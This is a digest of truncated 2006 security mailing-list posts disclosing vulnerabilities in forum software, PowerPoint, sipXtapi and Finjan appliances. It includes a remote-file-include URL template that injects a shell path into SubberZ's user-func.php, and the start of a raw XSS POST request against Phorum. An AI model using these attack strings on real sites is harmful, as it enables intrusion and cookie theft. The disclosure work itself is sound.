Re: phpbb 3.x sql injection (with global moderator rights)
2006-07-14 bugtraq neothermic com
This issue has been fixed in CVS. I will also remind everyone that 3.0 is beta software and has not yet had a security audit, and therefore we do not recommend to use the beta in a live environment. I would also like to remind people that in future we would appreciate it if such reports could be

RE: MIMESweeper For Web 5.X Cross Site Scripting
2006-07-11 Erez Metula (erezmetula 2bsecure co il)
Hi list, I've been asked the following question: "It sounds like the net impact of this vulnerability is that an attacker can steal cookies for a site the user isn't allowed to visit anyway. In other words, there aren't going to be any interesting cookies to steal. Is there more to this attack s

SubberZ[Lite] - Remote File Include
2006-07-14 ChironeX FleckeriX Gmail Com
################ Chironex Fleckeri ###############################
#SubberZ[Lite] - Remote File Include
#Find by Chironex Fleckeri
#Mail/MSN: ChironeX.FleckeriX (at) Gmail (dot) Com
##################################################################
http://[site]/[path]/user-func.php?myadmindir=[Shell]

Microsoft PowerPoint 0-day Vulnerability FAQ document written
2006-07-14 Juha-Matti Laurio (juha-matti laurio netti fi)
I have written FAQ document including 33 items about the recently reported 0-day vulnerability in PowerPoint. This vulnerability is being exploited by Trojan horse including keylogger features. The document entitled as Microsoft PowerPoint 0-day Vulnerability FAQ is located at my SecuriTeam Blogs s

Re: [Full-disclosure] ERNW Security Advisory 02/2006 - Buffer Overflow in sipXtapi (used in AOL Triton)
2006-07-11 Mailinglists (mozilla ids-guide de)
The bug is confirmed and fixed, but it's up to the guys from sipfoundry to work on their changelogs ;-)
TD> is there an official notification from sipX?
TD> I don't see any mention to this vulnerability in the changelog
TD> On 7/10/06, mozilla (at) ids-guide (dot) de <mozilla (at) ids-guide (dot) de> wrote:
>>
>> ERNW

MiniBB Forum <= 1.5a Remote File Include Vulnerabilities
2006-07-15 matdhule gmail com
---------------------------------------------------------------------------------
MiniBB Forum <= 1.5a Remote File Include Vulnerabilities
---------------------------------------------------------------------------------
Author : Matdhule
Contact : matdhule (at) gmail (dot) com
Application : Mi

Phorum 5.1.14 XSS SQL injection Vulnerability
2006-07-11 securityconnection gmail com
Phorum 5.1.14
http://www.phorum.org
--------------------------
Cross Site Scripting (XSS)
--------------------------
POST http://target.xx:80/posting.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: target.xx
Content-Length: 447

message_id=0&forum_id=1&mode=<s

[SECURITY] Plain text password in Finjan Appliance 5100/8100 NG backup file
2006-07-11 finde_schwachstelle gmx net
Plain text password in backup file ( Finjan Appliance 5100/8100 NG)
The Version 8.3.5 is affected. In the new console function backup and restore the passwords are saved as plain text. The Finjan Appliance uses a Firebird database. The backup saves the database as text file. Samba and FTP passwo

XSS phpBB 2.0.21 in administration
2006-07-11 renatrix gmail com
phpBB 2.0.21 XSS in administration
**********************************
//-- By Blwood [renatrix (at) gmail (dot) com]
//-- [ http://www.blwood.net ]
//-- Style Admin
-----------
Management & Create a theme
Lots of input are not properly "filtrate" like style_name, head_stylesheet, body_backgrou

Product: Invision Power Board
Version: 2.1 <= 2.1.6
Vendor: INVISION Power Service
URL: http://www.invisionpower.com
VULNERABILITY CLASS: SQL injection
[Product Description]
Invision Power Board, an award-winning scaleable bulletin board system, written in PHP, uses S